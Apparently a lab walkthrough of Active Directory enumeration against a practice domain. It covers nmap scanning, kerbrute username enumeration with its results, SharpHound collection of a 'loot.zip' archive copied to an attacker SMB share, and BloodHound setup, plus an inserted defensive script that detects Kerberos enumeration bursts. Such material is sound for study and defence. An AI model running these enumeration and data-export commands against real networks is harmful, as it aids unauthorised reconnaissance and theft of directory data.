Active Directory - Enumeration
Information gathering
Information gathering on services like RDP can tell you a good deal about an Active Directory host or domain.
- Target: THM-AD
- Domain: spookysec.local
- DNS Entry: AttacktiveDirectory.spookysec.local
$ nmap -p 53,80,88,135,139,445,464,593,636,3268,3269,3389 -sV -sC -oN scan.vuln.nmap 10.10.169.152
[...]
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2022-02-13T17:33:50
|_Not valid after: 2022-08-15T17:33:50
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2022-02-14T18:27:20+00:00
|_ssl-date: 2022-02-14T18:27:30+00:00; -1s from scanner time.
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
[...]
User enumeration
$ kerbrute userenum --dc 10.10.169.152 -d spookysec.local userlist.txt
[...]
2022/02/14 19:37:15 > Using KDC(s):
2022/02/14 19:37:15 > 10.10.169.152:88
2022/02/14 19:37:16 > [+] VALID USERNAME: james@spookysec.local
2022/02/14 19:37:17 > [+] VALID USERNAME: svc-admin@spookysec.local
2022/02/14 19:37:19 > [+] VALID USERNAME: James@spookysec.local
2022/02/14 19:37:20 > [+] VALID USERNAME: robin@spookysec.local
2022/02/14 19:37:28 > [+] VALID USERNAME: darkstar@spookysec.local
2022/02/14 19:37:33 > [+] VALID USERNAME: administrator@spookysec.local
[...]
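A defender-side counterpart to the enumeration above, added here as an example and not part of the original notes: the noisy part of a username enumeration against the KDC is a burst of TGT requests (Event ID 4768) for accounts that do not exist, failure code 0x6. The script is mine, reads a constructed flattened log format (real 4768 events are XML) with constructed sample lines, and flags any source that asks about five or more distinct unknown accounts within a minute.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Windows Security events (ID 4768, Kerberos TGT requested),
# flattened to one key=value line each; the real events are XML, so this format
# is an assumption.  Status 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) means the account
# named in the request does not exist in the domain.
SAMPLE_LOG = """\
2022-02-14T19:37:15Z EventID=4768 TargetUserName=alice Status=0x6 IpAddress=::ffff:10.9.52.138
2022-02-14T19:37:15Z EventID=4768 TargetUserName=bob Status=0x6 IpAddress=::ffff:10.9.52.138
2022-02-14T19:37:16Z EventID=4768 TargetUserName=james Status=0x0 IpAddress=::ffff:10.9.52.138
2022-02-14T19:37:16Z EventID=4768 TargetUserName=carol Status=0x6 IpAddress=::ffff:10.9.52.138
2022-02-14T19:37:17Z EventID=4768 TargetUserName=dave Status=0x6 IpAddress=::ffff:10.9.52.138
2022-02-14T19:37:18Z EventID=4768 TargetUserName=erin Status=0x6 IpAddress=::ffff:10.9.52.138
2022-02-14T19:37:40Z EventID=4768 TargetUserName=robin Status=0x0 IpAddress=::ffff:10.10.0.7
2022-02-14T19:42:01Z EventID=4768 TargetUserName=typo.user Status=0x6 IpAddress=::ffff:10.10.0.7
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) EventID=4768 TargetUserName=(?P<user>\S+) "
                     r"Status=(?P<status>0x[0-9a-fA-F]+) IpAddress=(?P<ip>\S+)$")

def parse_events(text):
    """Yield (timestamp, user, status, ip) for every well-formed 4768 line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated or malformed line: skip rather than crash the detector
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        ip = m["ip"]
        yield ts, m["user"], m["status"].lower(), ip[7:] if ip.startswith("::ffff:") else ip

def find_user_enumeration(text, threshold=5, window=timedelta(minutes=1)):
    """Return {source_ip: sorted distinct unknown users} for every source that asked
    the KDC about at least `threshold` distinct nonexistent accounts within `window`.
    One mistyped logon (a single 0x6 from a host) never reaches the threshold."""
    by_ip = defaultdict(list)
    for ts, user, status, ip in parse_events(text):
        if status == "0x6":
            by_ip[ip].append((ts, user))
    alerts = {}
    for ip, events in by_ip.items():
        events.sort()  # oldest first so each index can start a sliding window
        for i, (start, _) in enumerate(events):
            users = {u for t, u in events[i:] if t - start <= window}
            if len(users) >= threshold:
                alerts[ip] = sorted(users)
                break
    return alerts
```

On the constructed sample only 10.9.52.138 is reported; the single unknown-user request from 10.10.0.7 stays below the threshold.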
BloodHound
BloodHound allows you to make a graph of an Active Directory domain and quickly find misconfiguration vulnerabilities in it.
- Graphical viewer: BloodHound
- Collector: SharpHound
- Graph database: neo4j
Get started
- Download SharpHound on the victim host.
- Using the PowerShell version:
  - Load SharpHound:
    .\SharpHound.ps1
  - Start the SharpHound collection:
    Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
- Using the executable version:
  - Start the SharpHound collection:
    .\SharpHound.exe -d CONTROLLER.local --zipfilename loot.zip
- Download the resulting archive to your attacker machine:
  copy .\20220219102531_loot.zip \\10.9.52.138\tmpshare\loot.zip
- Run the neo4j server:
  sudo docker run --rm -p 7474:7474 -p 7687:7687 -e NEO4J_AUTH=neo4j/toto -v /tmp/neo4j/data:/data neo4j
- Run BloodHound: download the release and execute it:
  ./BloodHound-linux-x64/BloodHound
- Log in with:
  - Host: bolt://localhost:7687
  - Username: neo4j
  - Password: toto
- Drag and drop loot.zip into BloodHound.
You can run pre-defined queries by clicking on the menu (burger icon), then Analysis, and finally on the queries you want to execute.